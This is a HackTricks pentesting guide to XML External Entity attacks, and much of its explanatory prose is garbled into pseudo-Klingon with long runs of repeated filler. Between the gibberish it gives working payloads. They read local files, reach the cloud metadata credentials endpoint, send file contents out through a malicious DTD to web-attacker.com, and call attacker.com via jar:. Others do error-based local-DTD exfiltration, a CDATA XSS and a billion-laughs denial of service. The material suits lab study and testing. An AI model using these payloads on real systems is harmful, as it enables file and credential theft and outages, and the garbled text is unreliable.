hacktricks/pentesting-web/xxe-xee-xml-external-entity.md

# XXE - XEE - XML External Entity

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>


## XML Basics

XML is a markup language designed for data storage and transport, featuring a flexible structure that allows for the use of descriptively named tags. It differs from HTML by not being limited to a set of predefined tags. XML's significance has declined with the rise of JSON, despite its initial role in AJAX technology.

- **Data Representation through Entities**: Entities in XML enable the representation of data, including special characters like `&lt;` and `&gt;`, which correspond to `<` and `>` to avoid conflict with XML's tag system.

- **Defining XML Elements**: XML allows for the definition of element types, outlining how elements should be structured and what content they may contain, ranging from any type of content to specific child elements.

- **Document Type Definition (DTD)**: DTDs are crucial in XML for defining the document's structure and the types of data it can contain. They can be internal, external, or a combination, guiding how documents are formatted and validated.

- **Custom and External Entities**: XML supports the creation of custom entities within a DTD for flexible data representation. External entities, defined with a URL, raise security concerns, particularly in the context of XML External Entity (XXE) attacks, which exploit the way XML parsers handle external data sources: `<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`

- **XXE Detection with Parameter Entities**: For detecting XXE vulnerabilities, especially when conventional methods fail due to parser security measures, XML parameter entities can be utilized. These entities allow for out-of-band detection techniques, such as triggering DNS lookups or HTTP requests to a controlled domain, to confirm the vulnerability.
- `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>`
- `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>`


## Main attacks

**[Most of these attacks were tested using the awesome Portswiggers XEE labs: https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)**

### New Entity test

In this attack I'm going to test if a simple new ENTITY declaration is working
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY toreplace "3"> ]>
<stockCheck>
<productId>&toreplace;</productId>
<storeId>1</storeId>
</stockCheck>
```
![](<../.gitbook/assets/image (220).png>)

### QaStaHvIS

_/etc/passwd_ vItlhutlh `/etc/passwd` vItlhutlh. Windows Daq vItlhutlh: `C:\windows\system32\drivers\etc\hosts`

vItlhutlhDaq vItlhutlhDaq, SYSTEM "_\*\*file:///\*\*etc/passwd_" vItlhutlh.
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>
```
![](<../.gitbook/assets/image (221).png>)

**vItlhutlh:** QaStaHvIS web server PHP lo'laHbe'chugh, 'ej vItlhutlh Portswiggers labs'e' lo'laHbe'.
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<data>&example;</data>
```
### QaStaHvIS

vaj case Hoch, `Element stockCheck` jatlh `ANY` ghotvam'e' jatlh.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT stockCheck ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
<storeId>1</storeId>
</stockCheck3>
```
![](<../.gitbook/assets/image (222) (1).png>)

### Directory listing

**Java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like (just asking for the directory instead of the file):

**Klingon Translation:**

![](<../.gitbook/assets/image (222) (1).png>)

### qachHa'wI' qonwI'

**Java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like (just asking for the directory instead of the file):
```xml
<!-- Root / -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>

<!-- /etc/ -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
```
### SSRF

**SSRF** (Server-Side Request Forgery) jatlh **XXE** (XML External Entity) vItlhutlh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **XXE** (XML External Entity) vItlhutlh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItlhutlh **cloud** vIleghlaHbe'chugh **SSRF** (Server-Side Request Forgery) vItl
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
```
### Blind SSRF

**QI'lop** **previously commented technique** vItlhutlh **server** **vulnerable** **show** **control** **server** **access** **make**. **'ach**, **XML entities** **allowed** **not**, **case** **XML parameter entities** **try** **could**:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://gtd8nhwxylcik0mt2dgvpeapkgq7ew.burpcollaborator.net"> %xxe; ]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
### "Blind" SSRF - Exfiltrate data out-of-band

**vItlhutlh** _**SSRF**_ **- Exfiltrate data out-of-band**

**vaj** _**SSRF**_ **- Exfiltrate data out-of-band** **wej** _**server**_ **vItlhutlh** _**DTD**_ **jatlhlaH** **malicious payload** **vItlhutlh** **HTTP request** **vItlhutlh** **file content** **vIleghlaH** **(multi-line files** **ftp://** **vItlhutlh)**. **vaj** **explanation** **Portswiggers lab** **[**_**here**_**](https://portswigger.net/web-security/xxe/blind)**.**

**vItlhutlh** **malicious DTD** **Example:**
**vItlhutlh** **structure** **vItlhutlh** **follows:**
```xml
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
```
The steps executed by this DTD include:

1. **Definition of Parameter Entities:**
- An XML parameter entity, `%file`, is created, reading the content of the `/etc/hostname` file.
- Another XML parameter entity, `%eval`, is defined. It dynamically declares a new XML parameter entity, `%exfiltrate`. The `%exfiltrate` entity is set to make an HTTP request to the attacker's server, passing the content of the `%file` entity within the query string of the URL.

2. **Execution of Entities:**
- The `%eval` entity is utilized, leading to the execution of the dynamic declaration of the `%exfiltrate` entity.
- The `%exfiltrate` entity is then used, triggering an HTTP request to the specified URL with the file's contents.

The attacker hosts this malicious DTD on a server under their control, typically at a URL like `http://web-attacker.com/malicious.dtd`.

**XXE Payload:**
To exploit a vulnerable application, the attacker sends an XXE payload:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
### Error Based(External DTD)

**vaj vItlhutlh XML parameter entity `%xxe` 'ej DTD vItlhutlh. XML parser, vaj DTD external DTD vItlhutlh, vaj DTD vItlhutlh vItlhutlh xml parser, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj DTD vItlhutlh vItlhutlh, vaj 
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
### **Error Based (system DTD)**

**QaQ** (external DTD) **vItlhutlh** (out-of-band interactions are blocked) **'ej** (external connections aren't available)?.

**XML** (XML language specification) **DaH** (expose sensitive data through error messages) **'e'** (document's DTD blends internal and external declarations) **ghItlh** (loophole) **XML** (XML parameter entity) **'ej** (originally declared in an external DTD) **'e'** (internal DTD) **redefinition** (facilitating the execution of error-based XXE attacks). **attackers** (Such attacks) **XML** (XML parameter entity) **redefinition** (originally declared in an external DTD) **'ej** (from within an internal DTD) **'e'** (exploit). **server** (When out-of-band connections are blocked by the server) **'ej** (attackers) **rely** (must rely) **local DTD files** (on local DTD files) **conduct** (to conduct) **attack** (the attack), **aiming** (aiming) **parsing error** (to induce a parsing error) **reveal** (to reveal) **sensitive information** (sensitive information).


**/usr/local/app/schema.dtd** (Consider a scenario where the server's filesystem contains a DTD file at `/usr/local/app/schema.dtd`), **custom_entity** (defining an entity named `custom_entity`). **attacker** (An attacker) **submitting** (can induce) **hybrid DTD** (a hybrid DTD) **follows** (as follows):
```xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
```
<!--md-->
The outlined steps are executed by this DTD:

- The definition of an XML parameter entity named `local_dtd` includes the external DTD file located on the server's filesystem.
- A redefinition occurs for the `custom_entity` XML parameter entity, originally defined in the external DTD, to encapsulate an [error-based XXE exploit](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages). This redefinition is designed to elicit a parsing error, exposing the contents of the `/etc/passwd` file.
- By employing the `local_dtd` entity, the external DTD is engaged, encompassing the newly defined `custom_entity`. This sequence of actions precipitates the emission of the error message aimed for by the exploit.


**Real world example:** Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso`
<!--md-->
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
```
![](<../.gitbook/assets/image (224).png>)

**Qapla'!** Qagh technique vItlhutlh **internal DTD** vaj **valid DTD** laH. **'ej** vaj **OS / Software** **'ej** **server** **install** **search** **default DTDs**, **grab** **list** **default DTDs** **systems** **'ej** **check** **exist**.
```xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
```
### ghItlhutlh

[https://portswigger.net/web-security/xxe/blind](https://portswigger.net/web-security/xxe/blind) qarDaq yIlo'laHbe'.

### tIq DTDs cha'logh

ghItlhutlh github repo vItlhutlh **paths of DTDs that can be present in the system**:

{% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %}

vaj, **Docker image of the victim system** jImej, **scan** the **image** and **find** the path of **DTDs** present inside the system. [Readme of the github](https://github.com/GoSecure/dtd-finder) qarDaq 'oH.
```bash
java -jar dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar

Scanning TAR file /tmp/dadocker.tar

[=] Found a DTD: /tomcat/lib/jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd
Testing 0 entities : []

[=] Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd
Testing 0 entities : []
```
### XXE via Office Open XML Parsers

For a more in depth explanation of this attack, **check the second section of [this amazing post](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) from Detectify**.

The ability to **upload Microsoft Office documents is offered by many web applications**, which then proceed to extract certain details from these documents. For instance, a web application may allow users to import data by uploading an XLSX format spreadsheet. In order for the parser to extract the data from the spreadsheet, it will inevitably need to parse at least one XML file.

To test for this vulnerability, it is necessary to create a **Microsoft Office file containing an XXE payload**. The first step is to create an empty directory to which the document can be unzipped.

Once the document has been unzipped, the XML file located at `./unzipped/word/document.xml` should be opened and edited in a preferred text editor (such as vim). The XML should be modified to include the desired XXE payload, often starting with an HTTP request.

The modified XML lines should be inserted between the two root XML objects. It is important to replace the URL with a monitorable URL for requests.

Finally, the file can be zipped up to create the malicious poc.docx file. From the previously created "unzipped" directory, the following command should be run:

Now, the created file can be uploaded to the potentially vulnerable web application, and one can hope for a request to appear in the Burp Collaborator logs.


### Jar: protocol

The **jar** protocol is made accessible exclusively within **Java applications**. It is designed to enable file access within a **PKZIP** archive (e.g., `.zip`, `.jar`, etc.), catering to both local and remote files.
```
jar:file:///var/myarchive.zip!/file.txt
jar:https://download.host.com/myarchive.zip!/file.txt
```
{% hint style="danger" %}
To be able to access files inside PKZIP files is **super useful to abuse XXE via system DTD files.** Check [this section to learn how to abuse system DTD files](xxe-xee-xml-external-entity.md#error-based-system-dtd).
{% endhint %}

The process behind accessing a file within a PKZIP archive via the jar protocol involves several steps:

1. An HTTP request is made to download the zip archive from a specified location, such as `https://download.website.com/archive.zip`.
2. The HTTP response containing the archive is stored temporarily on the system, typically in a location like `/tmp/...`.
3. The archive is then extracted to access its contents.
4. The specific file within the archive, `file.zip`, is read.
5. After the operation, any temporary files created during this process are deleted.

An interesting technique to interrupt this process at the second step involves keeping the server connection open indefinitely when serving the archive file. Tools available at [this repository](https://github.com/GoSecure/xxe-workshop/tree/master/24_write_xxe/solution) can be utilized for this purpose, including a Python server (`slow_http_server.py`) and a Java server (`slowserver.jar`).
```xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:http://attacker.com:8080/evil.zip!/evil.dtd">]>
<foo>&xxe;</foo>
```
{% hint style="danger" %}
Writing files in a temporary directory can help to **escalate another vulnerability that involves a path traversal** (such as local file include, template injection, XSLT RCE, deserialization, etc).
{% endhint %}

### XSS

{% hint style="danger" %}
Qa'HomDaq vItlhutlhlaHbe'chugh **path traversal** (local file include, template injection, XSLT RCE, deserialization, etc) vulnerability vItlhutlhlaHbe'chugh **escalate** vItlhutlhlaHbe'.
{% endhint %}
```xml
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
```
### DoS

#### Billion Laugh Attack

#### DoS

#### Billion Laugh Attack
```xml
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
```
#### Yaml tIq

Yaml tIq vItlhutlh. Yaml tIq vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh. Yaml tIq vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh 